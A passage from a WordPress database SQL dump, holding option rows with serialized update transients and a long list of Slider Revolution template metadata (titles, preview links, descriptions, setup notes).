ate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.4.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.4.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.4.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.4.2\";s:7:\"version\";s:5:\"5.4.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.3\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1597795875;s:15:\"version_checked\";s:5:\"5.3.4\";s:12:\"translations\";a:0:{}}', 'no'),
(66639, '_site_transient_update_themes', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1597795876;s:7:\"checked\";a:2:{s:13:\"Impreza-child\";s:3:\"1.0\";s:7:\"Impreza\";s:5:\"5.2.1\";}s:8:\"response\";a:0:{}s:12:\"translations\";a:0:{}}', 'no'),
(73486, 'rs-templates-new', '', 'no');
INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(73488, 'rs-templates', 'a:2:{s:6:\"slider\";a:442:{i:0;a:22:{s:2:\"id\";s:1:\"1\";s:5:\"title\";s:16:\"Classic Carousel\";s:5:\"alias\";s:16:\"classic-carousel\";s:3:\"zip\";s:20:\"classic-carousel.zip\";s:3:\"uid\";s:32:\"146a01dd380c0cdee85c4456ee68cd84\";s:3:\"img\";s:27:\"classic-carousel/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/carousel-slider-plugin/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:141:\"<span class=\"ttm_content\">Our classic, full-width carousel example. Drag, swipe or click to navigate!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:284:\"<span class=\"ttm_content\">This is a \"Default\" content carousel. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-22 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:1;a:22:{s:2:\"id\";s:1:\"2\";s:5:\"title\";s:14:\"Classic Slider\";s:5:\"alias\";s:13:\"classicslider\";s:3:\"zip\";s:17:\"classicslider.zip\";s:3:\"uid\";s:32:\"a0d6a9248c9066b404ba0f1cdadc5cf2\";s:3:\"img\";s:24:\"classicslider/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-slideshow-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:136:\" <span class=\"ttm_content\">A classic slideshow example with timer, bullets and arrow navigation.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:2;a:22:{s:2:\"id\";s:1:\"3\";s:5:\"title\";s:12:\"Content Tabs\";s:5:\"alias\";s:11:\"contenttabs\";s:3:\"zip\";s:15:\"contenttabs.zip\";s:3:\"uid\";s:32:\"e02e91604b690123a3d07a65582c4fd0\";s:3:\"img\";s:22:\"contenttabs/slider.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/wordpress-content-tabs-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:170:\" <span class=\"ttm_content\">An auto-size slider with a cool split-text animation effect. Navigate with vertical bullets and thumbs.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:3;a:22:{s:2:\"id\";s:1:\"4\";s:5:\"title\";s:13:\"Facebook Feed\";s:5:\"alias\";s:13:\"facebook-feed\";s:3:\"zip\";s:17:\"facebook-feed.zip\";s:3:\"uid\";s:32:\"5506431d5b1babcb25dcf52c508d42e3\";s:3:\"img\";s:24:\"facebook-feed/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-facebook-feed/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:174:\"<span class=\"ttm_content\"> This slider is automatically populated by a Facebook stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Facebook Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:4;a:22:{s:2:\"id\";s:1:\"5\";s:5:\"title\";s:7:\"Fashion\";s:5:\"alias\";s:7:\"fashion\";s:3:\"zip\";s:11:\"fashion.zip\";s:3:\"uid\";s:32:\"4f4b914d6db35e19101ff003c4e7ea3a\";s:3:\"img\";s:18:\"fashion/slider.jpg\";s:7:\"preview\";s:65:\"http://revolution.themepunch.com/wordpress-one-page-slider-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:183:\"  <span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or bullets.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:5;a:22:{s:2:\"id\";s:1:\"6\";s:5:\"title\";s:14:\"Flickr Gallery\";s:5:\"alias\";s:14:\"flickr-gallery\";s:3:\"zip\";s:18:\"flickr-gallery.zip\";s:3:\"uid\";s:32:\"ad85cfac7acfa678e6a1b8febfee51ed\";s:3:\"img\";s:25:\"flickr-gallery/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-flickr-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"640\";s:11:\"description\";s:173:\" <span class=\"ttm_content\"> This slider is automatically populated by a Flickr stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:413:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Flickr Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:6;a:22:{s:2:\"id\";s:1:\"7\";s:5:\"title\";s:3:\"Gym\";s:5:\"alias\";s:3:\"gym\";s:3:\"zip\";s:7:\"gym.zip\";s:3:\"uid\";s:32:\"e4d81f13f96fb9bc905f4ad89615032b\";s:3:\"img\";s:14:\"gym/slider.jpg\";s:7:\"preview\";s:59:\"http://revolution.themepunch.com/one-page-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:189:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or the slider menu.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:7;a:22:{s:2:\"id\";s:1:\"8\";s:5:\"title\";s:18:\"Highlight Carousel\";s:5:\"alias\";s:18:\"highlight-carousel\";s:3:\"zip\";s:22:\"highlight-carousel.zip\";s:3:\"uid\";s:32:\"ada52163f723a942f782351fa0396b3d\";s:3:\"img\";s:29:\"highlight-carousel/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-swipe-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"720\";s:11:\"description\";s:138:\"  <span class=\"ttm_content\">A swipe-controlled carousel with an additional tab-based navigation.</span>\r\n<span class=\"ttm_space\"></span>\r\n\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:8;a:22:{s:2:\"id\";s:1:\"9\";s:5:\"title\";s:18:\"Highlight Showcase\";s:5:\"alias\";s:18:\"highlight-showcase\";s:3:\"zip\";s:22:\"highlight-showcase.zip\";s:3:\"uid\";s:32:\"2bfe0bd410fb48fec9d942eab1e21530\";s:3:\"img\";s:29:\"highlight-showcase/slider.jpg\";s:7:\"preview\";s:62:\"http://revolution.themepunch.com/wordpress-parallax-slideshow/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"720\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">A tab-based navigation, a slideshow timer and cool animations make this slider interesting!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:9;a:22:{s:2:\"id\";s:2:\"10\";s:5:\"title\";s:10:\"Image Hero\";s:5:\"alias\";s:10:\"image-hero\";s:3:\"zip\";s:13:\"imagehero.zip\";s:3:\"uid\";s:32:\"7db18781d44f2adc28c962440894aac1\";s:3:\"img\";s:20:\"imagehero/slider.jpg\";s:7:\"preview\";s:54:\"http://revolution.themepunch.com/wordpress-hero-image/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:121:\"<span class=\"ttm_content\">A commonly used full-width image hero block with texts.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:10;a:22:{s:2:\"id\";s:2:\"11\";s:5:\"title\";s:17:\"Instagram Gallery\";s:5:\"alias\";s:13:\"insta-gallery\";s:3:\"zip\";s:17:\"insta-gallery.zip\";s:3:\"uid\";s:32:\"711732b0d42ec2b57818a2b9b1d86cba\";s:3:\"img\";s:24:\"insta-gallery/slider.jpg\";s:7:\"preview\";s:61:\"http://revolution.themepunch.com/wordpress-instagram-gallery/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"640\";s:6:\"height\";s:3:\"640\";s:11:\"description\";s:174:\"<span class=\"ttm_content\">This slider is automatically populated by a Instagram stream. Just one slide is needed to show a whole feed!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:416:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Instagram Stream\"</a>. Make sure to input your correct API information in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:11:\"socialmedia\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:11;a:22:{s:2:\"id\";s:2:\"12\";s:5:\"title\";s:21:\"Levano Restaurant Bar\";s:5:\"alias\";s:19:\"levanorestaurantbar\";s:3:\"zip\";s:23:\"levanorestaurantbar.zip\";s:3:\"uid\";s:32:\"4178f837db67d1b2eb6cb5840bbd0b42\";s:3:\"img\";s:30:\"levanorestaurantbar/slider.jpg\";s:7:\"preview\";s:63:\"http://revolution.themepunch.com/wordpress-front-page-template/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:181:\"<span class=\"ttm_content\">A front-page slider that can be used as an intro for your website. Navigate by using mouse-wheel scroll or bullets.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:583:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Instructions for <a href=\"https://www.themepunch.com/faq/modify-burger-menu/\" target=\"_blank\">changing the menu</a>.</span><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:12;a:22:{s:2:\"id\";s:2:\"13\";s:5:\"title\";s:19:\"Main Feature Slider\";s:5:\"alias\";s:11:\"mainfeature\";s:3:\"zip\";s:15:\"mainfeature.zip\";s:3:\"uid\";s:32:\"1e002a3230ab00095bedc6f60393ee7f\";s:3:\"img\";s:22:\"mainfeature/slider.jpg\";s:7:\"preview\";s:33:\"http://revolution.themepunch.com/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"750\";s:11:\"description\";s:127:\" <span class=\"ttm_content\">A slightly stripped down version of the main preview slider.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:13;a:22:{s:2:\"id\";s:2:\"14\";s:5:\"title\";s:17:\"Media Gallery Two\";s:5:\"alias\";s:17:\"media-gallery-two\";s:3:\"zip\";s:21:\"media-gallery-two.zip\";s:3:\"uid\";s:32:\"d002f1b1b55805f9322c264c5504ba5a\";s:3:\"img\";s:28:\"media-gallery-two/slider.jpg\";s:7:\"preview\";s:64:\"http://revolution.themepunch.com/wordpress-media-gallery-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"692\";s:11:\"description\";s:127:\"<span class=\"ttm_content\">A media gallery example with Vimeo, HTML5 and Youtube videos.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change media and titles.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:14;a:22:{s:2:\"id\";s:2:\"15\";s:5:\"title\";s:23:\"Media Carousel Autoplay\";s:5:\"alias\";s:23:\"media-carousel-autoplay\";s:3:\"zip\";s:27:\"media-carousel-autoplay.zip\";s:3:\"uid\";s:32:\"393d7875b1cc9d933378b35e4f645d76\";s:3:\"img\";s:34:\"media-carousel-autoplay/slider.jpg\";s:7:\"preview\";s:57:\"http://revolution.themepunch.com/wordpress-media-gallery/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:3:\"720\";s:6:\"height\";s:3:\"405\";s:11:\"description\";s:153:\"<span class=\"ttm_content\">A media carousel with \"autoplay\" activated. Swipe or click tabs to navigate the slider.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:289:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change media and caption texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:15;a:22:{s:2:\"id\";s:2:\"16\";s:5:\"title\";s:21:\"News Background Video\";s:5:\"alias\";s:21:\"news-background-video\";s:3:\"zip\";s:17:\"news-bg-video.zip\";s:3:\"uid\";s:32:\"a0efe44ac3af0f958b3f84c816a08272\";s:3:\"img\";s:24:\"news-bg-video/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-content-blocks/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:143:\"<span class=\"ttm_content\">A hero block with HTML5 background video that plays when entering the screen.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background video and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:16;a:22:{s:2:\"id\";s:2:\"17\";s:5:\"title\";s:12:\"News Gallery\";s:5:\"alias\";s:12:\"news-gallery\";s:3:\"zip\";s:16:\"news-gallery.zip\";s:3:\"uid\";s:32:\"3a069c3b286dbb9ee435563f747e3300\";s:3:\"img\";s:23:\"news-gallery/slider.jpg\";s:7:\"preview\";s:56:\"http://revolution.themepunch.com/wordpress-news-rotator/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:131:\"<span class=\"ttm_content\">A news gallery slideshow with tab navigation. Great for any blog!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:282:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Just edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:17;a:22:{s:2:\"id\";s:2:\"18\";s:5:\"title\";s:23:\"News Gallery Post Based\";s:5:\"alias\";s:23:\"news-gallery-post-based\";s:3:\"zip\";s:27:\"news-gallery-post-based.zip\";s:3:\"uid\";s:32:\"32fe05b1039c29ab9420bfd15aec5488\";s:3:\"img\";s:34:\"news-gallery-post-based/slider.jpg\";s:7:\"preview\";s:55:\"http://revolution.themepunch.com/wordpress-post-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:125:\"<span class=\"ttm_content\"> This slider is automatically populated by WordPress posts.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:423:\"<span class=\"ttm_content\">The content source is set to <a href=\"https://www.themepunch.com/slider-revolution/module-content/#flickr\" target=\"_blank\">\"Post-Based Slider\"</a>. Make sure to select the post type you want to display in the slider settings.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:9:\"postbased\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:18;a:22:{s:2:\"id\";s:2:\"19\";s:5:\"title\";s:9:\"News Hero\";s:5:\"alias\";s:9:\"news-hero\";s:3:\"zip\";s:13:\"news-hero.zip\";s:3:\"uid\";s:32:\"96a0385538a17c8c81ed8175740f70ea\";s:3:\"img\";s:20:\"news-hero/slider.jpg\";s:7:\"preview\";s:58:\"http://revolution.themepunch.com/wordpress-content-blocks/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"5.0.5\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:107:\"<span class=\"ttm_content\">A image hero block with ken burns effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:300:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:15:\"Revolution Base\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"2016-02-24 13:21:33\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:19;a:22:{s:2:\"id\";s:2:\"20\";s:5:\"title\";s:10:\"News 